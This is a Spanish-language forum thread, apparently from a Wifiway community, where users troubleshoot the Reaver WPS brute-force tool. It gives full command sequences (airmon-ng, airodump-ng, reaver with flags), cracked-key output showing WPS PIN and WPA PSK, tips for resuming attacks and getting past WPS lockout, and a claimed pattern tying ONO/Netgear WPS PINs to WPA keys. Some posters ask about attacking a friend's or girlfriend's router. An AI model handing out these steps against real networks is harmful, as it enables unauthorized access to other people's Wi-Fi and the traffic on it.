reaver 1.4 revision 102 ------>> http://hotfile.com/dl/143267203/252ee7a/reaver-1.4-r102.xzm.html
no te has aclarado bien me parace que este funciona usando wifiway live USB yo en particular lo uso desde live USB en tu caso nose si lo usas desde live cd o live HD si lo usas desde live USB en el escritorio esta dispositivo de almacenamiento entras ahi t saldra el dibujo del usb lo pinchas te saldra boot wifiway pinchas en wifiway y ahi veras donde queda la base ;)Tu usas Wifiway 3.4 en USB? Yo lo ejecuto desde VirtualBox,lo are desde USB haber si asi me sale,Gracias ñandu ;)
no te has aclarado bien me parace que este funciona usando wifiway live USB yo en particular lo uso desde live USB en tu caso nose si lo usas desde live cd o live HD si lo usas desde live USB en el escritorio esta dispositivo de almacenamiento entras ahi t saldra el dibujo del usb lo pinchas te saldra boot wifiway pinchas en wifiway y ahi veras donde queda la base ;)Tu usas Wifiway 3.4 en USB? Yo lo ejecuto desde VirtualBox,lo are desde USB haber si asi me sale,Gracias ñandu ;)
EDITO: Sigo en VirtualBox y ya encontre la carpeta wifiway/base,entonces me pongo a atacar,cuando quiera pararlo le doy a Ctrl+C,luego Inicio/wifiway/wpa wps/salvar avance en XZM y me sale un icono en el escritorio,ese icono lo copio a base y cuando buelva a atacar el mismo router ira por donde lo pare?? Gracias y perdona por marearte ;D Saludos.
Ya me quedo mas claro,pero cuando cierro un ataque al volver a atacar no me dice nada de que lleve algun ataque empezado,pero bueno si cuando vaya a quitarlo y guardo un archivo.xzm,cuando ataque de nuevo a ese router pongo reaver -i mon0 -b MAC (archivo xzm) -vv y asi si me continua con el ataque,lo que no me sigue contando igual es el % dara igual o debe seguir por donde termino? Saludos.
reaver -i mon0 -b 00:11:22:33:44:55 -vv
reaver -i mon0 -b 00:11:22:33:44:55 -vv
Yo mis conocimientos de linux son muy limitados, asi que al ver que el walsh de la version 3.4 del wifiway con el reaver 1.4, no me hacia nada, pues me baje el wifiway 3.0 (siempre uso live cds), y ahi instale el reaver 1.3 y entonces el walsh si me funcionaba, asi que pues para walsh por ahora usare el wifiway 3.0 y para el reaver usare el wifiway 3.4.
Gracias a tod@s por los esfuerzos en aumentar nuestra seguridad.
A ver si la proxima version de wifiway ya incluye una version de walsh que funcione, una vez mas gracias a tod@s
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.
Yo el proceso lo hago del siguiente modo.# airmon-ng start wlan0
# airodump-ng mon0
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO
# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv
Tengo la version 1.4 de reaver (en teoria la actualice desde la que trae WW3.4) y tengo problemas para comprobar redes onoXXXX con macs C0:3F:0E:XX:XX:XX y A0:21:B7:XX:XX:XX. La cosa es que llega al 90,90% y se queda probando el mismo pin todo el tiempo (99985677). Con otras redes que comprobe si que me funciono reaver. A alguien mas le paso esto?a veces las tajetas se quedan "out" ...salva la sesion de reaver..cierra todo, desmonta la interfaz monitor.
reaver 1.4 revision 102 ------>> http://hotfile.com/dl/143267203/252ee7a/reaver-1.4-r102.xzm.html
Tengo la version 1.4 de reaver (en teoria la actualice desde la que trae WW3.4) y tengo problemas para comprobar redes onoXXXX con macs C0:3F:0E:XX:XX:XX y A0:21:B7:XX:XX:XX. La cosa es que llega al 90,90% y se queda probando el mismo pin todo el tiempo (99985677). Con otras redes que comprobe si que me funciono reaver. A alguien mas le paso esto?a veces las tajetas se quedan "out" ...salva la sesion de reaver..cierra todo, desmonta la interfaz monitor.
airmon-ng stop monX
si es usb y puedes..despincha la tarjeta y vuelvela a pinchar ..la vuelves a poner en monitor
airmon-ng start wlanX
y vuelves a lanzar el ataque de nuevo , cuando te pregunte si deseas continuar el ataque en curso le das a la "y" , y ya esta.
y si no ..tocara reiniciar.
Tengo la version 1.4 de reaver (en teoria la actualice desde la que trae WW3.4) y tengo problemas para comprobar redes onoXXXX con macs C0:3F:0E:XX:XX:XX y A0:21:B7:XX:XX:XX. La cosa es que llega al 90,90% y se queda probando el mismo pin todo el tiempo (99985677). Con otras redes que comprobe si que me funciono reaver. A alguien mas le paso esto?
prueba con wash (no walsh) en wifiway 3.4
prueba con wash (no walsh) en wifiway 3.4
He probado con wash en wifiway 3.4 y no detecta nada tampoco, en cambio he probado el Reaver 1.4 en el BackTrack 5 R1, con el Wash 1.4, y si funciona
buenas,hice las pruebas para ver si tenia wps activado,vi que si,me vino asi de fabrica,pero al intentar hacerlo con reaver no consigo nada...se que el pin es 12345670 pero aun asi no soy capaz de hacer nada,si lo dejo mucho tiempo se me queda en 90,91% ¿sera que mi router es inmune a estos ataques?o algo que estoy haciendo mal...os adjunto una imagen.
gracias.
http://img42.imageshack.us/img42/9648/1wdak.jpg
uso wifiway 3.4 mi tarjeta es una intel wifi link 5100 el reaver por si solo no se me asocia,me asocio mediante wpa_supliccant no se si estos datos sirven de algo...¿Desde dos ordenadores, con dos tarjetas diferentes?
es decir que asi es imposible que pueda sacar mi clave wpa,no?se me queda en ese pin pero se supone que es ese...es que no se que es lo que me pasa,porque e probado desde dos ordenadores y me pasa lo mismo en los dos...
Comment 14 by kub...@gmail.com, Jan 24, 2012
I had this problem, ran without the -L switch and NOW reaver correctly found the key :) nice
Comment 15 by tiago.ju...@gmail.com, Jan 28 (4 days ago)
Thanks Cheff, without the -L the key was properly found. yeh
-Pues ya lo probe, el inflator con los gráficos de nvidia no se ven los menus, hay que correrlo en modo gráfico auto.
Y está version del reaver no me asocia con ninguno de mis dos adaptadores wifi usb, un ralink y un zidas... mi gozo en un pozo, he probado de 1000 maneras y no consigo hacerlo funcionar :(
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from x
[!] WARNING: Failed to associate with x (ESSID: x)
yo tengo una pregunta,ahora cuando escaneo mi router con wash,me dice que esta en wps locked y he visto que con la funcion -l se salta ese bloqueo.es eso cierto?porque ami siempre se me queda en el primer pin y lo he dejao horas y horas uso una rtl8187.luego otro pregunta se puede usar wps reaver contra un red oculta?dado que tengo un conocido que tiene una y me salta el wash que es vulnerable y no se si probar o no siempre con su permiso claro!
un saludo a todos.
P.D lo del tema del modulo de reaver 1.4 final tienes que copiar el modulo que ha echo USUARIONUEVO a la carpera wifiway/modules y pegarlo ai eso si es un usb live.si es en live cd modificar la iso como te he explicao antes y grabar un cd nuevo!
un saludo a todos de nuevo
hazlee doble click al modulo y ya se instala sobre el otro y le vuelves a hacer doble click para desactivarlo y dejar el que trae el wifiway
hola
ano ser que haya cambiado en la ultima version, los modulos en wifiway instalada en HD se cargan asi:
Copias el modulo que querais instalar en el escritorio de Wifiway.
Abres una consola desde la barra de tareas
Escribes en la consola:
lzm2dir /root/Desktop/****.lzm / (cambiar los **** por el nombre del modulo que habias copiado en el escritorio y ojo la "D" de Desktop en mayuscula)
Esperas a que llegue a 100% y ya lo teneis instalado, ahora puedes cerrar la consola y eliminar el archivo del modulo que copiaste en el escritorio
salduos
los módulos ya no son lzm a lo mejor lo dices por eso y los xzm ya no se cargan igual yo aun no lo he probado
Pues no sé, yo uso la última version del wifiway 3.4 en un live cd y con clickear en el módulo que tengo en un directorio del HD, me sale " the module has intalled sucefully" y el inflator esta dentro del directorio correcto y me detecta los ap's con wps activado, cosa que con el que trae el wifiway por defecto no pasa..
Asi que supongo que se instala temporalmente de manera correcta.
xzm2dir , aunque no se si al final eso se incorporo.
decidmelo ...por que creo que el xzm2dir se quedo fuera.
si fuese asi se hace un modulo.
yo el inflator no debo saberlo utilizar,porq entro en el,pongo la tarjeta en modo monitor,le doy a escanear redes y no me encuentra ninguna con el wps activado,y mi red si que lo tiene activado...no se que hare mal
Hola, he probado el reaver por primera vez y me ha sacado el WPS PIN de ONOXXXX tras unas horas, pero la clave WPA no :-[ (antes he mirado con el wireshark que tenia puesto microsoft wps y estaba en 0x02 pero sólo me ha sacado el pin wps) es eso normal? ???
Hola, he probado el reaver por primera vez y me ha sacado el WPS PIN de ONOXXXX tras unas horas, pero la clave WPA no :-[ (antes he mirado con el wireshark que tenia puesto microsoft wps y estaba en 0x02 pero sólo me ha sacado el pin wps) es eso normal? ???
No, si te da el pin correctamente también te debe dar la clave PSK. Fíjate bien en la información que te muestra cuando reaver acaba, en este mismo hilo tienes algunas capturas de lo que te debe aparecer.
para warcry, me gustaria saber si tienen alguna relacion el pin de ono con la clave wpa porque pusiste como que a partir del segundo digito de la wpa coincidia con el pin, yo es que tengo un ono sin wps activado y aunque me ha sacado el pin no me a dao la wpa, entonces haber si se puede de alguna forma enlazarlo o buscar coincidencias
Información para el que le interese en ONOXXXX con wpa2-psk con reaverEse router es Netgear A0:21:B7:xx:xx:xx?
WPS PIN: 123456789
WPA KEY: X1234567XX
repite casi todo menos el principio y el final
ola me he fijado que los routers livebox de orange 00:19:70:xx:xx:xx cuando haces un ataque con wps reaver y estan en lock off,el ataque ya no continua,y si acabas el ataque y lo buscas con wash te aparece como wps locked on?que puede ser?como saltarterlo es el router de mi novia.
saludos
hola
son los ap que tienen wps, después serán vulnerables, o no
saludos